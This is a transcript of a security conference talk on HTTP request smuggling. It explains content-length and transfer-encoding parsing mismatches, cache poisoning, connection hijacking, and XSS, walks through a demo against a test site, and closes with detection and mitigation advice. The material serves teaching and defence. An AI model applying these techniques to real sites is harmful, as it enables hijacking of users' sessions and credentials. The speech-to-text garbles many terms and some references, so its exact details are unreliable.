 Welcome to this talk on request modeling. My name is Philippe Parclot. Thank you for the great presentation, Max. So I have one slide left to do. So I'm a security researcher as a Max at GoSecure. I focus mainly on application security. So if you have a question about any of those projects, you can poke me afterward. So the topic of today is HTTP request modeling, or I've shortened it to request modeling. The way I divide this talk first, we're going to start with the introduction to a key concept needed to understand request modeling. So mainly HTTP tunneling introduced by HTTP 1.1. There have been some new variants recently, but I'm going to focus on the various technique related to HTTP 1.1 specifically. I'm going to do an overview of the different attack and the risk associated to request modeling, so mainly cache poisoning, credential hijacking, or connection hijacking, URL filtering bypass, and XSS. At the end, I'm going to present what are the mitigation depending on what appliance you have installed. This will apply both to a cloud provider and if you have on-premise infrastructure, and also a key takeaway to summarize everything. So this presentation doesn't bring new exploit or new CVs specifically. What I've tried to do is an introduction to request modeling and summarize these three main presentation. So first in 2005, there is this company, WatchPire, that introduced the concept of request modeling. Already in 2005, all the risks that I'm going to present are most the cache poisoning, the XSS, and the connection hijacking were already present in this paper. What happened in 2016 is this French researcher, Regis Leroy, presented at DEF CON with a variant of this same attack using a different header called transfer encoding. We're going to see later how it's working. But what really put request modeling on the map is the presentation from James Kittle in 2019, introducing again small new variants but mainly presenting some actual case of an iProfile website. So we're going to see a few examples in this presentation. And at this point in 2019, it became really a popular variety and people become more aware of it. In 2016, the proof concept were not as convincing, I would say, but still all the paper were detailing all the detail of the exploit. So to understand request modeling, we need to understand HTTP tunneling. HTTP tunneling is a concept of HTTP 1.1. So we can see a main difference between HTTP 1.0 and 1.1 is that initially, HTTP was one request equal one TCP connection. This is not best for performance because there's a lot of in-shake involved every time you do a request. And for a simple plain HTML web page, it could make sense. It's lightweight, not lightweight, but simple to implement. The thing is, as soon as you have a couple of image styles sheet JavaScript files that are referred by this page, certainly you have a ton of TCP connection required just to load one page. In 1.1, per system connection were introduced. With this concept, we're going to be able to put in the same pipeline, so HTTP pipeline, multiple requests in a continuous matter. It also introduced transfer recording header that will be used in some variant later. So visually, how does it look? HTTP pipelining. So HTTP pipelining is used by client, but HTTP client include boats, browser, and backend server that communicate with other backend servers. So a proxy would do HTTP pipelining because, in the end, they don't want to create a ton of sockets for every client. And they want to reuse connection to reduce the number of TCP and shake, as one example. So if one client send two requests, we can see here that the requests are placed first in the socket connection. If we have another client that sends two other connections, they're going to be placed potentially in the same connection pool or connection, I should say. So here, it's a pool of only one connection. So in the same socket, we have four requests from two different clients. Another reason they are doing HTTP pipelining is that we don't have to wait for the response to send another request. We can send all the requests all at once and parse the response as they come. So that's HTTP pipelining. Now, if we look inside of the socket at multiple requests in one connection, we can see a few requests here, three requests. And if I am adding some color, we can see that there are three requests. But how does the proxy or the web server knows where each request ends? Because this is really important. We have multiple clients and multiple requests per client. So we need to know where everything ends in a precise manner. So I've added some color. But server are not guessing. They need some clear spec. So what they will use here is ContentLand. ContentLand header is pretty simple. So with ContentLand 0, this means after header, we're going to have two new lines, so stashar, stashan, two times. And then it's going to be the content of the post body, the body of the request. Here in this case, it's 0. So right away, we're continuing to the next request. The second request is a post request where there is a ContentLand that is not 0 because it has multiple parameters in post. So here it's simple. ContentLand is red. And this way, we know where every request ends. Request smuggling is going to take effect if we have an infrastructure where there is a proxy, either a proxy that we have put in place, so our own web cache, maybe something that has firewall feature or a web proxy. But it could also be a cloud provider, maybe a cloudflare, fastie, et cetera, that is in between the client, so the browser, and our web server. And request smuggling in a nutshell is when the proxy looking at the connection will interpret one request, while the back end for the same series of bytes will see two requests. And the reason for that is that the parser will have some small differences that the attacker will try to capitalize on. So let's see a first attack. So this is a proof concept that is taken from the first paper, so the paper from 2005 from Watch Fire. I've taken this example because it's really simple to understand, but keep in mind that this will not work in modern system because, for example, Angelinix and Apache will simply block requests, any request that has multiple content length. But 2005, the paper, all the payload were focusing on double content length in one request. So here on the left, we're gonna see what the proxy see and on the right, what the server will interpret. And so it's the same communication. It's not a two box two request. This is the same communication. And the reason the proxy and the back end will not interpret it the same way is that when they parse the request, it's a bit like parsing JSON. You're gonna parse multiple properties. And if you have to store those values in an Ash map, for example, if you have a value that are unique per key, once you're gonna encounter a duplicate, you can either choose to override the existing value or simply ignore the following one. So in the case, in this case, the first, the proxy also on the left, will simply always override with the last header. So here it's gonna keep the value 37 for the content length while the backend, the web server here is keeping the first one and will never override this value. So you can add 10 header of content length. It will keep the first one, which is zero. So what this introduced, it introduced a problem where we're reading two different content length so they don't agree where the first request end. So in the case, the first case is gonna be between blah and get test while the second one is gonna be ending right before the get profile. So what is the effect? So the first scenario that they are presenting in the paper from 2005, out of four or five risk is cache poisoning because on the left, the proxy will think that we're requesting to index and then test page while the backend is answering to the path index and profile slash one, two, three, seven. So what is gonna happen if our proxy is also having a feature of caching is that the first page will be returned as expected so the response will match what was requested but for the second page, we're actually returning user data, so partly profile information from the user ID one, three, seven and the content of this JSON will be overriding the test.htm. So this is problematic because the attacker will send this malicious request but every user that will request test.htm afterward will be using this poison resources. So some of the other risks that are presented in this first paper already in 2005, cache poisoning as we saw, capability to bypass real infertering. So if we have authentication or a path that are blacklist by the proxy, so think about a path that might be administrative console, maybe monitoring console or any management page that one needed to be blacklist. These could be bypassed. Credential hijacking or connection hijacking is going to be when we are going to do a second request that is incomplete and is gonna grab the following request or a request from another user and we're gonna try to get some value reflected. So we're gonna send an example in a moment. Persistent XSS, I put it in code. We're gonna be able to force HTML or JavaScript to a user that are visiting the website without special interaction. So all they need to do is visit the website and they are gonna receive an XSS. So there's gonna be a demo at the end of their presentation. So an open-videoc is a very similar cases to the XSS. So I'm gonna present an example, but here this time with a more modern technique. So the technique that was presented with the talk at DEF CON by Regis, Laura is using transfer encoding chunk. So transfer encoding chunk is a feature from HTTP 1.1 that aim to allow server to response, provide some huge response. So think about maybe a large XML file that is maybe generated on the fly and maybe you don't know the length of this response ahead of time. So instead of computing everything in memory, know the size and send the response. You can with a transfer encoding chunk send each of part of your file one chunk at a time. So here I have a file that I'm generating on the fly. So the way it's gonna work, where first the first line is always the size in hexadecimal of the following line. So then you can pass any binary or ASCII value. Then the second part is eight character long. So we have Northsec. And then conference is 11. 11, the length of this chunk. So we're passing B. And the last part is always zero just to acknowledge the browser. We're done with sending the response. This is completed. So here we have no content length description of all the requests at once. Why this feature is useful is that while it might be aimed at server response, it can also be used in a request. So if I'm requesting the index page from myapp.com, I can also include the post body in a chunk format and that's what we're going to abuse. So it can be abused because content length and transfer encoding are kind of colliding because they serve the same feature. They are describing the length of the body of a post request. So when this was introduced, an RFC specified what you should do if the client is sending both content length and transfer encoding. The answer to this is the RIC says when there is transfer encoding, you should use this adder. So you should ignore content length at all. So there should be a priority in transfer encoding. But the way transfer encoding is parsed, this adder might differ from one infrastructure to another. So one server from one server to another. An example of this is here with where the backend here is going to parse a transfer encoding adder while there's not an invalid adder separation. So as you might know, every adder in an HTTP request should be separate by slash R slash N. No matter what, this is not a Windows or Linux thing. Every request, no matter the platform should always be slash R slash N. But this specific backend was parsing adder with new line that are just slash N, so not the new line. So for this reason, the proxies is parsing the request as the spec and only seeing content length. It's not seeing transfer encoding adder in the first request. But if we do the same communication, our backend is parsing it differently, so switching in chunk mode. And for this reason, the zero that is initially placed will be interpreted as we have a chunk that will follow of zero. So ending the request, and then we have another one that is starting. So what is happening is we have a request that is not yet completed that is still in the pipeline. So we're gonna receive a response for the first part in blue. But the next user that will send a request, its request will be basically glued to the previous one that we've started. So we are forcing the request update profile to the user. So all its cookie and all the adders from its request will be append to this request. So that's what we are seeing visually in orange. So this is called connection hijacking. A few other alternatives to this that were found by the talk from James Kiddall. So that's his main focus for his 2019 talk is that he found tons of variation in actual software. So either if you place a non-printable character between the column and chunk. As you can see, there are a ton of variation and the bird plugin that was released to support this testing has numerous variation of this. So if you are reading the paper from James Kiddall, you will see that they are often referring with some short name and that I'll be using later also in this presentation. The prefix is always what the proxy is seeing and the second part is what the backend is seeing. So that's it for this. So yeah, sometimes the proxy will look at content then, but sometimes it will interpret a transparent coding. So this is not one site, sometimes it can be reversed. An example of connection hijacking. So very similar to the one previously where we were forcing the update profile, but with a real case scenario that was found by James Kiddall on New Relic platform and specifically the login server. So the first element that need to be recognized is that the login email field is reflected in the page. So as soon as there's an incorrect login, so if it's forcing an incorrect password, so there's no chance that the login will work, but the email is reflected in the page. So what can we do about this if we have a, if we did take that the server is also vulnerable to HP request smuggling? Here we're gonna do the technique with transparent coding chunk where the, so it's very similar to the double content land header that we add initially, the simple payload from the beginning, but here we're taking advantage of, we're gonna override the transferring encoding header with X, so just to nullify that there's even the chunk mode enabled. So the proxy doesn't see chunking at all because it's keeping the last header in the case where there's our duplicate headers. The second on the left, we can see what the backend is seeing and the backend is here we're passing, we're starting a new request for the login. So this is the request that was reflecting the login email field, but we're not gonna finish the request. So we need to specify a huge content land and basically we're gonna grab the following requests. So basically content from another user and what James Cato managed to do is a proof concept where he was able to intercept, post request to the login page that was reflected in his form. I went submitting the request on the left. So now here's an example of how can we abuse XSS with the same technique? So instead of grabbing the next request here we're gonna happen something to force an XSS on the response of the next user, so the user that has the request next in the HTTP pipeline. So here it's a very simple cases. This was found I think in a SAS provider that was kept anonymized, but basically it looked like a provider that simply doesn't support chunking and coding. So it's probably a proprietary stack that was made, that was unmade. Here, yeah, so the backend doesn't support chunking and coding. So for this reason we're abusing it by making the content land huge to grab almost everything. I don't know, so the first request is using chunk. So for this, the chunk part will grab everything. So we have a 10 and 66 that will grab the actual request or the first part of our request that we want to force while the proxy, not the proxy, the backend will see it differently. I'm gonna do a demo in a moment with XSS with a simpler case, but here we're injecting it in the body. So the response that the second user will see is basically it will, so yeah, the SAML equal is not the response, but what is sent to the page, but because it was reflecting the SAML parameter in the response, here we could exploit the XSS. So why are we doing this instead of reflecting XSS? First, there's no interaction needed, and sometimes there are some specific condition that make the XSS theoretically unexploitable, but because of request modeling, sometimes we can add header that are required to the exploitation. So we needed a demo, so I'm going to demonstrate request modeling with a very simple website called simple website. So this website has a contact form that is interesting because if we look at, if we add some additional parameter that are not there initially, these are reflected here in the page. So we might look for a potential XSS by appending some value, but we can see that everything is encoded, but the everything here is encoded by the browser, and this is something that make, theoretically this XSS not exploitable, so if I'm sending this to repeater, so it's not really possible unless you're going to all version of IE. So, but if we send an actual mail that is unescape, so unencoded here, we will see that it's actually reflected. I'm actually in the right page, yes. So we can see here, I'm going to add some character to make it more visual, but we can see that everything here is not escaped. So we're going to take advantage of this, that the fact that we can exploit it this way by crafting our own request. So it's going to be a simple request where the proxy will look at the content land header while the backend will support chunk properly and will see two different requests, and the second starting here. We will not see the response for the second request, but any user that will be following our requests will see an XSS. So I will send this malicious payload. So for what we're receiving here is the response for the first request, so nothing special, but if we're a user navigating on the website, we're not going to see something yet, and this is something you need to be aware with request smuggling, is that proxies will often have multiple connection pools, so you might need multiple requests. So here I'm using HTTP Apache traffic server, and after 10 requests, we can see that a user was hijacked, so I could have been visiting any page. In the end, I received a response for the contact form. So this is the quick demo. Before doing a payload like this, how can you discover such a reality? So here I have some quick payload. So there is a plugin and different scanner that will try to detect this. This is a payload that is basically testing both chunk and content at the same time, and what we want to see is if the second request is actually using chunk mode, can we happen one character could be X, could be G, anything to the next request just to break the method. So the method, the next request should be a post or a get or potentially a put, let's see. So when we send this, we're not going to see something yet, but if we do a lot of requests with our payload at some point, we might receive something like a 405 not allow. 405 stands for method not allow. Why does it come to this? It's because it's actually doing a G post here because we're repeating a post request. And at some point, our request combined with a previous one. I remember hearing in one of the presentation by James Kiddall that for one exploit, he had to send 800 requests to confirm the reality. So this is a reality that is hard to confirm because in real infrastructure, you're not the only one doing requests. So you need to be patient and have a good idea of what you're trying. So if you can extract, for example, version or some information about what the proxy is being used and what is the backend, you can find a reality like this or be more precise. I know the scanner from the BERT plugin is using a timeout technique and this is not perfect because it will miss a few cases, including the demo I've present. I've run the scanner and didn't found it, but I'm gonna show a quick way, a quick tip to still find the reality if you're using the plugin. Okay, so now I'll be you defend against this with this reality. The quick, the easy answer is just do your updates. So Apache traffic server, Angelics, Varnish, HAProxy, all have received fixes. There are some exception like I know BigFix was mentioned in the presentation where they say they have done a fix, but it's actually not visually where they mentioned to mitigation. So it's not built in. So if you're having F5 in your infrastructure, there are two methods to mitigate the issue. So, and one of the issue is to activate advanced WAF and a specific role to block request modeling. So be aware that sometimes they say there's a fix, but actually there is a method for mitigation. So in the case of F5, they have created a new role. So don't try to modify your own application to mitigate this. Adding a few security errors won't fix this issue. So, content security policy will not have any effect at preventing these type of instances because we're controlling all the other parameter and even part of the body. Cloud services have provided some fixes but none of the provider listed here have made a public response of how they have implemented it, but there is an RFC 7232 that is giving guideline of how you should normalize requests. So when you have both transfer encoding and content land, how can you normalize the query to be sure that there's no ambiguity? So they are using it. So this is a screenshot for detection. So that's one of the best way to be 100% sure. So even if you have done your update, be sure that you're not involved. So it's an extra protection. Doing some manual tests will be helpful also. But this is the plugin from Burr. These are all tests that can be done when you're on the request modeling scan. Be aware that some case will not be found because they expect some time out to be created with some payload. And in multiple cases that I've test, it didn't found the reality that I've introduced. So, but you can find the reality still using the plugin. So if you have the flow plugin from Burr, flow is basically showing you all the requests from Burr. So everything that you see in the proxy, but also request initiate by a plugin. And you will see here request initiate by plugin and respond that our 405 should be fishy and analyzed because either this request or one of the previous one have introduced a glitch that introduce a bad method. So look for a 405 now, this is important. If you're doing manual testing, make sure your clients for disabled content and because by default, Burr will simply rewrite content and other. So it might be breaking your payload without you noticing it. So be aware of this. So already at the last slide, so take away request modeling can greatly affect your application. We've seen multiple risk and attacks. So this is not only one vector. There are multiple venue. If there are some, if you are renowned to this, make sure you test your environment with automated tools and potentially manual testing. There are some new variant that I don't have the time to cover, but recently there have been some variant with a WebSocket and HTTP2. So while in 2019, James Kedall had some new variant with transfer recording, there are some variant that allow specifically bypassing URL filtering. So if you have time to check those, there are some nice proof of concept available by the company that found the venue initially with for HTTP2. And apparently the talk from this year from James Kedall is gonna be on HTTP2. And most of the key related are already published from late last year. It was a nominate as a top 10 attack of last year. So if you are looking for the slide, there is this short link. And for to reproduce the demonstration I've made, I didn't have time to do the HTTP2 one. But if you're curious, these are in the slide, so on. The slide should be already available.